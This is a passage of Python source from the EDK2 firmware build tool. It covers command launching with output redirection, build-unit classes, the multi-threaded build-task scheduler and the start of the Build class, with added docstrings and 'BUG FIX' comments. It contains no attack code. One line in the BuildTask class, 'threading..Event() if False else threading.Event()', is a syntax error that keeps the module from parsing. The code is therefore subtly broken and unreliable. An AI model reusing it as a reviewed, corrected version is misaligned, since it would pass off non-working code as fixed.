                EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
    # check EDK_TOOLS_PATH (must happen before normalization below)
    if "EDK_TOOLS_PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="EDK_TOOLS_PATH")
    os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
    # check PATH
    if "PATH" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="PATH")
    GlobalData.gWorkspace = WorkspaceDir
    GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
    GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
    """Normalize *FilePath* and return it relative to *Workspace*.

    Absolute paths are simply normalized; relative paths are resolved
    against the (multiple-)workspace.  Aborts via EdkLogger.error when the
    resulting file does not exist.
    """
    if os.path.isabs(FilePath):
        FileFullPath = os.path.normpath(FilePath)
    else:
        # Resolve against the multiple-workspace root the file lives in.
        FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
        Workspace = mws.getWs(Workspace, FilePath)
    # The file must exist, otherwise the build cannot proceed.
    if not os.path.isfile(FileFullPath):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
    # Strip the workspace prefix (plus separator when the prefix lacks one).
    prefix_len = len(Workspace) if Workspace[-1] in ("\\", "/") else len(Workspace) + 1
    return FileFullPath[prefix_len:]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag, MemTo=None):
    """Pump lines from the byte stream *From* into the callable *To*.

    Runs until EOF (empty read) or until *ExitFlag* is set after a line has
    been processed.  When *MemTo* is given, every line is also appended to
    it, except that MSVC "Note: including file:" lines are captured into
    *MemTo* only (not echoed to *To*).
    """
    while True:
        raw = From.readline()
        # An empty bytes object (or None) signals end of stream.
        if raw is None or raw == b"":
            break
        text = raw.rstrip().decode(encoding='utf-8', errors='ignore')
        if MemTo is None:
            To(text)
        elif text.lstrip()[:21] == "Note: including file:":
            # /showIncludes note: record for dependency tracking, don't echo.
            MemTo.append(text)
        else:
            To(text)
            MemTo.append(text)
        if ExitFlag.is_set():
            break
class MakeSubProc(Popen):
    """Popen subclass that carries a buffer for captured stdout lines.

    ProcOut is filled by the stdout-reader thread (see ReadMessage) and is
    later consumed for dependency-file generation.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Lines of process output collected by the stdout redirector thread.
        self.ProcOut = []
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir, ModuleAuto=None):
    """Run an external build command in *WorkingDir*, streaming its output.

    Output is pumped through a redirector thread into EdkLogger and into the
    process object's ProcOut buffer.  On success, optionally generates
    dependency files for *ModuleAuto*.  Returns the elapsed time as a string
    like "1234ms".  Aborts via EdkLogger.error on startup failure or a
    non-zero exit code.

    Fixes vs. original:
    - The non-zero-returncode path joined Command unconditionally; on
      non-Windows, Command is already a str at that point, so
      " ".join(Command) produced a space-separated character soup in the
      error message.  The isinstance guard (as used in the Proc-is-None
      path) is restored.
    - The respfile read now uses a with-statement, and the pairwise loop
      guards against an odd number of lines to avoid an IndexError.
    """
    BeginTime = time.time()
    # if working directory doesn't exist, Popen() will raise an exception
    if not os.path.isdir(WorkingDir):
        EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
    # Command is used as the first Argument in following Popen().
    # It could be a string or sequence. We find that if command is a string in following Popen(),
    # ubuntu may fail with an error message that the command is not found.
    # So here we may need convert command from string to list instance.
    if platform.system() != 'Windows':
        if not isinstance(Command, list):
            Command = Command.split()
        Command = ' '.join(Command)
    Proc = None
    EndOfProcedure = None
    try:
        # launch the command
        Proc = MakeSubProc(Command, stdout=PIPE, stderr=STDOUT, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
        # launch a thread to read and redirect STDOUT (stderr is merged in)
        EndOfProcedure = Event()
        EndOfProcedure.clear()
        if Proc.stdout:
            StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure, Proc.ProcOut))
            StdOutThread.name = "STDOUT-Redirector"
            StdOutThread.daemon = False
            StdOutThread.start()
        # waiting for program exit
        Proc.wait()
    except:  # in case of aborting (incl. KeyboardInterrupt)
        # terminate the threads redirecting the program output
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        if EndOfProcedure is not None:
            EndOfProcedure.set()
        if Proc is None:
            if not isinstance(Command, type("")):
                Command = " ".join(Command)
            EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
    if Proc.stdout:
        StdOutThread.join()
    # MU_CHANGE begin
    # # check the return code of the program
    # if Proc.returncode != 0:
    #     if not isinstance(Command, type("")):
    #         Command = " ".join(Command)
    #     # print out the Response file and its content when make failure
    #     RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
    #     if os.path.isfile(RespFile):
    #         f = open(RespFile)
    #         RespContent = f.read()
    #         f.close()
    #         EdkLogger.info(RespContent)
    #     EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
    RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
    if os.path.isfile(RespFile):
        with open(RespFile) as f:
            RespContent = f.read().splitlines()
        EdkLogger.info("Built with Respfile ... %s", WorkingDir)
        # Lines come in (command, flags) pairs; guard against a trailing odd line.
        for i in range(0, len(RespContent) - 1, 2):
            cmd = RespContent[i]
            cmd = cmd[cmd.find("OUTPUT")+7 : cmd.find("_resp.txt")]
            flags = RespContent[i+1]
            EdkLogger.info("  \"%s_FLAGS\" : %s" % (cmd.upper(), flags))
    if Proc.returncode != 0:
        # BUG FIX: only join when Command is still a sequence; joining a str
        # produced a space-separated character string in the error message.
        if not isinstance(Command, type("")):
            Command = " ".join(Command)
        EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
    # MU_CHANGE end
    if ModuleAuto:
        iau = IncludesAutoGen(WorkingDir, ModuleAuto)
        if ModuleAuto.ToolChainFamily == TAB_COMPILER_MSFT:
            iau.CreateDepsFileForMsvc(Proc.ProcOut)
        else:
            iau.UpdateDepsFileforNonMsvc()
        iau.UpdateDepsFileforTrim()
        iau.CreateModuleDeps()
        iau.CreateDepsInclude()
        iau.CreateDepsTarget()
    return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
    """Base class for a schedulable build unit (module or platform).

    The wrapped object must provide __str__(), __eq__() and __hash__() so
    that units can be deduplicated and queued; equality additionally
    compares the architecture.
    """

    def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
        """Store the build object, its command, target, dependencies and
        working directory; abort the build when no command is configured."""
        self.BuildObject = Obj
        self.Dependency = Dependency
        self.WorkingDir = WorkingDir
        self.Target = Target
        self.BuildCommand = BuildCommand
        if not BuildCommand:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
                            ExtraData=str(Obj))

    def __str__(self):
        """Delegate to the wrapped build object's string form."""
        return str(self.BuildObject)

    def __eq__(self, Other):
        """Two units are equal when they wrap equal objects of the same arch."""
        return (Other
                and self.BuildObject == Other.BuildObject
                and Other.BuildObject
                and self.BuildObject.Arch == Other.BuildObject.Arch)

    def __hash__(self):
        """Hash combines the wrapped object and its architecture."""
        return hash(self.BuildObject) + hash(self.BuildObject.Arch)

    def __repr__(self):
        return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
    """Build unit for a single module built via nmake/make.

    The wrapped object is expected to be a ModuleAutoGen instance; its
    library dependencies are recursively wrapped as units that must build
    first.
    """

    def __init__(self, Obj, BuildCommand, Target):
        # Libraries this module links against must be built beforehand.
        library_units = [ModuleMakeUnit(La, BuildCommand, Target) for La in Obj.LibraryAutoGenList]
        BuildUnit.__init__(self, Obj, BuildCommand, Target, library_units, Obj.MakeFileDir)
        # Default targets map to the module-level "tbuild" make target.
        if Target in [None, "", "all"]:
            self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
    """Build unit for a whole platform built via nmake/make.

    The wrapped object is expected to be a PlatformAutoGen instance; all of
    its libraries and modules become dependency units.
    """

    def __init__(self, Obj, BuildCommand, Target):
        # BUG FIX: the dependency lists were built from self.BuildObject,
        # which is only assigned inside BuildUnit.__init__ below — so the
        # original raised AttributeError before the base constructor ran.
        # Use the Obj parameter directly instead.
        Dependency = [ModuleMakeUnit(Lib, BuildCommand, Target) for Lib in Obj.LibraryAutoGenList]
        Dependency.extend([ModuleMakeUnit(Mod, BuildCommand, Target) for Mod in Obj.ModuleAutoGenList])
        BuildUnit.__init__(self, Obj, BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
    """Multi-threaded build task manager.

    Class-level state implements a scheduler: tasks move from _PendingQueue
    (dependencies unresolved) to _ReadyQueue (dependencies met) to
    _RunningQueue (thread launched).  A BoundedSemaphore caps concurrency,
    and threading.Events communicate errors and scheduler lifetime to the
    main thread (which cannot catch exceptions raised in workers).
    NOTE(review): the lock/event ordering here is deliberate and
    order-sensitive — do not reorder acquire/release pairs.
    """
    # queue for tasks waiting for schedule
    _PendingQueue = OrderedDict()
    _PendingQueueLock = threading.Lock()
    # queue for tasks ready for running
    _ReadyQueue = OrderedDict()
    _ReadyQueueLock = threading.Lock()
    # queue for run tasks
    _RunningQueue = OrderedDict()
    _RunningQueueLock = threading.Lock()
    # queue containing all build tasks, in case duplicate build
    _TaskQueue = OrderedDict()
    # flag indicating error occurs in a running thread
    _ErrorFlag = threading..Event() if False else threading.Event()
    _ErrorFlag.clear()
    _ErrorMessage = ""
    # BoundedSemaphore object used to control the number of running threads
    _Thread = None
    # flag indicating if the scheduler is started or not
    _SchedulerStopped = threading.Event()
    _SchedulerStopped.set()

    ## Start the task scheduler thread
    #
    #   @param      MaxThreadNumber     The maximum thread number
    #   @param      ExitFlag            Flag used to end the scheduler
    #
    @staticmethod
    def StartScheduler(MaxThreadNumber, ExitFlag):
        SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
        SchedulerThread.name = "Build-Task-Scheduler"
        SchedulerThread.daemon = False
        SchedulerThread.start()
        # wait for the scheduler to be started, especially useful in Linux
        while not BuildTask.IsOnGoing():
            time.sleep(0.01)

    ## Scheduler method
    #
    #   @param      MaxThreadNumber     The maximum thread number
    #   @param      ExitFlag            Flag used to end the scheduler
    #
    @staticmethod
    def Scheduler(MaxThreadNumber, ExitFlag):
        BuildTask._SchedulerStopped.clear()
        try:
            # use BoundedSemaphore to control the maximum running threads
            BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
            #
            # scheduling loop, which will exits when no pending/ready task and
            # indicated to do so, or there's error in running thread
            #
            while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
                   or not ExitFlag.is_set()) and not BuildTask._ErrorFlag.is_set():
                EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
                                % (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
                # get all pending tasks
                BuildTask._PendingQueueLock.acquire()
                BuildObjectList = list(BuildTask._PendingQueue.keys())
                #
                # check if their dependency is resolved, and if true, move them
                # into ready queue
                #
                for BuildObject in BuildObjectList:
                    Bt = BuildTask._PendingQueue[BuildObject]
                    if Bt.IsReady():
                        BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
                BuildTask._PendingQueueLock.release()
                # launch build thread until the maximum number of threads is reached
                while not BuildTask._ErrorFlag.is_set():
                    # empty ready queue, do nothing further
                    if len(BuildTask._ReadyQueue) == 0:
                        break
                    # wait for active thread(s) exit
                    BuildTask._Thread.acquire(True)
                    # start a new build thread
                    Bo, Bt = BuildTask._ReadyQueue.popitem()
                    # move into running queue
                    BuildTask._RunningQueueLock.acquire()
                    BuildTask._RunningQueue[Bo] = Bt
                    BuildTask._RunningQueueLock.release()
                    Bt.Start()
                    # avoid tense loop
                    time.sleep(0.01)
                # avoid tense loop
                time.sleep(0.01)
            # wait for all running threads exit
            if BuildTask._ErrorFlag.is_set():
                EdkLogger.quiet("\nWaiting for all build threads exit...")
            # while not BuildTask._ErrorFlag.is_set() and \
            while len(BuildTask._RunningQueue) > 0:
                EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
                EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.name for Th in threading.enumerate()))
                # avoid tense loop
                time.sleep(0.1)
        except BaseException as X:
            #
            # TRICK: hide the output of threads left running, so that the user can
            # catch the error message easily
            #
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
        # final cleanup always runs, whether the loop ended normally or not
        BuildTask._PendingQueue.clear()
        BuildTask._ReadyQueue.clear()
        BuildTask._RunningQueue.clear()
        BuildTask._TaskQueue.clear()
        BuildTask._SchedulerStopped.set()

    ## Wait for all running method exit
    #
    @staticmethod
    def WaitForComplete():
        BuildTask._SchedulerStopped.wait()

    ## Check if the scheduler is running or not
    #
    @staticmethod
    def IsOnGoing():
        return not BuildTask._SchedulerStopped.is_set()

    ## Abort the build
    @staticmethod
    def Abort():
        if BuildTask.IsOnGoing():
            BuildTask._ErrorFlag.set()
            BuildTask.WaitForComplete()

    ## Check if there's error in running thread
    #
    #   Since the main thread cannot catch exceptions in other thread, we have to
    #   use threading.Event to communicate this formation to main thread.
    #
    @staticmethod
    def HasError():
        return BuildTask._ErrorFlag.is_set()

    ## Get error message in running thread
    #
    #   Since the main thread cannot catch exceptions in other thread, we have to
    #   use a static variable to communicate this message to main thread.
    #
    @staticmethod
    def GetErrorMessage():
        return BuildTask._ErrorMessage

    ## Factory method to create a BuildTask object
    #
    #   This method will check if a module is building or has been built. And if
    #   true, just return the associated BuildTask object in the _TaskQueue. If
    #   not, create and return a new BuildTask object. The new BuildTask object
    #   will be appended to the _PendingQueue for scheduling later.
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    @staticmethod
    def New(BuildItem, Dependency=None):
        if BuildItem in BuildTask._TaskQueue:
            Bt = BuildTask._TaskQueue[BuildItem]
            return Bt
        Bt = BuildTask()
        Bt._Init(BuildItem, Dependency)
        BuildTask._TaskQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.acquire()
        BuildTask._PendingQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.release()
        return Bt

    ## The real constructor of BuildTask
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    def _Init(self, BuildItem, Dependency=None):
        self.BuildItem = BuildItem
        self.DependencyList = []
        if Dependency is None:
            Dependency = BuildItem.Dependency
        else:
            Dependency.extend(BuildItem.Dependency)
        self.AddDependency(Dependency)
        # flag indicating build completes, used to avoid unnecessary re-build
        self.CompleteFlag = False

    ## Check if all dependent build tasks are completed or not
    #
    def IsReady(self):
        ReadyFlag = True
        for Dep in self.DependencyList:
            if Dep.CompleteFlag == True:
                continue
            ReadyFlag = False
            break
        return ReadyFlag

    ## Add dependent build task
    #
    #   @param  Dependency      The list of dependent build objects
    #
    def AddDependency(self, Dependency):
        for Dep in Dependency:
            # binary modules and cache hits need no build, so no dependency edge
            if not Dep.BuildObject.IsBinaryModule and not Dep.BuildObject.CanSkipbyCache(GlobalData.gModuleCacheHit):
                self.DependencyList.append(BuildTask.New(Dep))    # BuildTask list

    ## The thread wrapper of LaunchCommand function
    #
    #   @param  Command A list or string contains the call of the command
    #   @param  WorkingDir      The directory in which the program will be running
    #
    def _CommandThread(self, Command, WorkingDir):
        try:
            self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir, self.BuildItem.BuildObject)
            self.CompleteFlag = True
            # Run hash operation post dependency to account for libs
            # Run if --hash or --binary-destination
            if GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
                self.BuildItem.BuildObject.GenModuleHash()
            if GlobalData.gBinCacheDest:
                self.BuildItem.BuildObject.GenCMakeHash()
        except:
            #
            # TRICK: hide the output of threads left running, so that the user can
            # catch the error message easily
            #
            if not BuildTask._ErrorFlag.is_set():
                GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
                                                                  self.BuildItem.BuildObject.Arch,
                                                                  self.BuildItem.BuildObject.ToolChain,
                                                                  self.BuildItem.BuildObject.BuildTarget
                                                                 )
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "%s broken\n    %s [%s]" % \
                                      (threading.current_thread().name, Command, WorkingDir)
        # indicate there's a thread is available for another build task
        BuildTask._RunningQueueLock.acquire()
        BuildTask._RunningQueue.pop(self.BuildItem)
        BuildTask._RunningQueueLock.release()
        BuildTask._Thread.release()

    ## Start build task thread
    #
    def Start(self):
        EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
        Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
        self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
        self.BuildTread.name = "build thread"
        self.BuildTread.daemon = False
        self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
    """Container for the information related to one EFI image.

    Holds naming, GUID, architecture and directory data alongside the
    parsed PE image object.  On construction the image size is rounded up
    to the next 4 KB (0x1000) boundary.
    """

    def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
        """Record the image metadata and page-align the image size.

        @param BaseName   The full file path of image.
        @param Guid       The GUID for image.
        @param Arch       Arch of this image.
        @param OutputDir  The output directory for image.
        @param DebugDir   The debug directory for image.
        @param ImageClass PeImage information object (must carry .Size).
        """
        self.BaseName = BaseName
        self.Guid = Guid
        self.Arch = Arch
        self.OutputDir = OutputDir
        self.DebugDir = DebugDir
        self.Image = ImageClass
        # Round up to the next page; note an exact multiple still gains a page.
        page = 0x1000
        self.Image.Size = (self.Image.Size // page + 1) * page
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
    def __init__(self, Target, WorkspaceDir, BuildOptions, log_q):
        """Load configuration and initialize the build session.

        Copies command-line options into instance state, loads
        target.txt/tools_def.txt, validates binary-cache option
        combinations, prints the build environment, runs pre/post-build
        hooks, and initializes the multiprocessing cache dictionaries.

        @param Target        The build command target, one of gSupportedTarget
        @param WorkspaceDir  The directory of workspace
        @param BuildOptions  Build options passed from command line
        @param log_q         Queue handed to worker processes for logging
        """
        self.WorkspaceDir = WorkspaceDir
        self.Target = Target
        self.PlatformFile = BuildOptions.PlatformFile
        self.ModuleFile = BuildOptions.ModuleFile
        self.ArchList = BuildOptions.TargetArch
        self.ToolChainList = BuildOptions.ToolChain
        self.BuildTargetList = BuildOptions.BuildTarget
        self.Fdf = BuildOptions.FdfFile
        self.FdList = BuildOptions.RomImage
        self.FvList = BuildOptions.FvImage
        self.CapList = BuildOptions.CapName
        self.SilentMode = BuildOptions.SilentMode
        # NOTE(review): thread count is fixed to 1 here; presumably adjusted
        # later from target.txt/options — confirm elsewhere in the file.
        self.ThreadNumber = 1
        self.SkipAutoGen = BuildOptions.SkipAutoGen
        self.Reparse = BuildOptions.Reparse
        self.SkuId = BuildOptions.SkuId
        if self.SkuId:
            GlobalData.gSKUID_CMD = self.SkuId
        self.ConfDirectory = BuildOptions.ConfDirectory
        self.SpawnMode = True
        self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
        # Timing accumulators (seconds) reported at the end of the build.
        self.AutoGenTime = 0
        self.MakeTime = 0
        self.GenFdsTime = 0
        self.MakeFileName = ""
        TargetObj = TargetTxtDict()
        ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"),"Conf")))
        self.TargetTxt = TargetObj.Target
        self.ToolDef = ToolDefObj.ToolDef
        GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
        #Set global flag for build mode
        GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
        GlobalData.gUseHashCache = BuildOptions.UseHashCache
        GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
        GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
        GlobalData.gEnableGenfdsMultiThread = not BuildOptions.NoGenfdsMultiThread
        GlobalData.gDisableIncludePathCheck = BuildOptions.DisableIncludePathCheck

        # Validate the binary-cache option combinations before any work starts.
        if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
        if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
        if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
        if GlobalData.gBinCacheSource:
            BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
            if not os.path.isabs(BinCacheSource):
                BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
            GlobalData.gBinCacheSource = BinCacheSource
        else:
            # A non-None falsy value (e.g. empty string) is an invalid option.
            if GlobalData.gBinCacheSource is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
        if GlobalData.gBinCacheDest:
            BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
            if not os.path.isabs(BinCacheDest):
                BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
            GlobalData.gBinCacheDest = BinCacheDest
        else:
            if GlobalData.gBinCacheDest is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")

        GlobalData.gDatabasePath = os.path.normpath(os.path.join(GlobalData.gConfDirectory, GlobalData.gDatabasePath))
        if not os.path.exists(os.path.join(GlobalData.gConfDirectory, '.cache')):
            os.makedirs(os.path.join(GlobalData.gConfDirectory, '.cache'))
        self.Db = BuildDB
        self.BuildDatabase = self.Db.BuildObject
        self.Platform = None
        self.ToolChainFamily = None
        self.LoadFixAddress = 0
        self.UniFlag = BuildOptions.Flag
        self.BuildModules = []
        self.HashSkipModules = []
        self.Db_Flag = False
        self.LaunchPrebuildFlag = False
        self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
        if BuildOptions.CommandLength:
            GlobalData.gCommandMaxLength = BuildOptions.CommandLength

        # print dot character during doing some time-consuming work
        self.Progress = Utils.Progressor()

        # print current build environment and configuration
        EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
        if "PACKAGES_PATH" in os.environ:
            # WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
        EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
        if "EDK_TOOLS_BIN" in os.environ:
            # Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
        EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
        if "PYTHON3_ENABLE" in os.environ:
            PYTHON3_ENABLE = os.environ["PYTHON3_ENABLE"]
            if PYTHON3_ENABLE != "TRUE":
                PYTHON3_ENABLE = "FALSE"
            EdkLogger.quiet("%-16s = %s" % ("PYTHON3_ENABLE", PYTHON3_ENABLE))
        if "PYTHON_COMMAND" in os.environ:
            EdkLogger.quiet("%-16s = %s" % ("PYTHON_COMMAND", os.environ["PYTHON_COMMAND"]))

        self.InitPreBuild()
        self.InitPostBuild()
        if self.Prebuild:
            EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
        if self.Postbuild:
            EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
        if self.Prebuild:
            self.LaunchPrebuild()
            # Re-load configuration: the prebuild step may have changed it.
            TargetObj = TargetTxtDict()
            ToolDefObj = ToolDefDict((os.path.join(os.getenv("WORKSPACE"), "Conf")))
            self.TargetTxt = TargetObj.Target
            self.ToolDef = ToolDefObj.ToolDef
        if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
            self.InitBuild()

        self.AutoGenMgr = None
        EdkLogger.info("")
        os.chdir(self.WorkspaceDir)
        self.log_q = log_q
        GlobalData.file_lock = mp.Lock()
        # Init cache data for local only
        GlobalData.gPackageHashFile = dict()
        GlobalData.gModulePreMakeCacheStatus = dict()
        GlobalData.gModuleMakeCacheStatus = dict()
        GlobalData.gHashChainStatus = dict()
        GlobalData.gCMakeHashFile = dict()
        GlobalData.gModuleHashFile = dict()
        GlobalData.gFileHashDict = dict()
        GlobalData.gModuleAllCacheStatus = set()
        GlobalData.gModuleCacheHit = set()
    def StartAutoGen(self,mqueue, DataPipe,SkipAutoGen,PcdMaList,cqueue):
        """Launch AutoGen worker processes and wait for them to finish.

        Spawns self.ThreadNumber AutoGenWorkerInProcess workers fed from
        mqueue, runs AutoGen for any PCD driver modules (PcdMaList) in the
        current process, then joins the AutoGenManager.

        Returns a (status, error_code) tuple: status is AutoGenMgr.Status;
        error_code is 0 on success, a FatalError code, or UNKNOWN_ERROR.
        """
        try:
            # Nothing to generate when AutoGen is explicitly skipped.
            if SkipAutoGen:
                return True,0
            feedback_q = mp.Queue()
            error_event = mp.Event()
            FfsCmd = DataPipe.Get("FfsCommand")
            if FfsCmd is None:
                FfsCmd = {}
            GlobalData.FfsCmd = FfsCmd
            auto_workers = [AutoGenWorkerInProcess(mqueue,DataPipe.dump_file,feedback_q,GlobalData.file_lock,cqueue,self.log_q,error_event) for _ in range(self.ThreadNumber)]
            self.AutoGenMgr = AutoGenManager(auto_workers,feedback_q,error_event)
            self.AutoGenMgr.start()
            for w in auto_workers:
                w.start()
            # PCD driver modules are handled in-process rather than by workers.
            if PcdMaList is not None:
                for PcdMa in PcdMaList:
                    # SourceFileList calling sequence impact the makefile string sequence.
                    # Create cached SourceFileList here to unify its calling sequence for both
                    # CanSkipbyPreMakeCache and CreateCodeFile/CreateMakeFile.
                    RetVal = PcdMa.SourceFileList
                    # Force cache miss for PCD driver
                    if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
                        cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "PreMakeCache", False))
                    PcdMa.CreateCodeFile(False)
                    PcdMa.CreateMakeFile(False,GenFfsList = DataPipe.Get("FfsCommand").get((PcdMa.MetaFile.Path, PcdMa.Arch),[]))
                    PcdMa.CreateAsBuiltInf()
                    # Force cache miss for PCD driver
                    if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
                        cqueue.put((PcdMa.MetaFile.Path, PcdMa.Arch, "MakeCache", False))
            # Block until the manager (and thus all workers) has finished.
            self.AutoGenMgr.join()
            rt = self.AutoGenMgr.Status
            err = 0
            if not rt:
                err = UNKNOWN_ERROR
            return rt, err
        except FatalError as e:
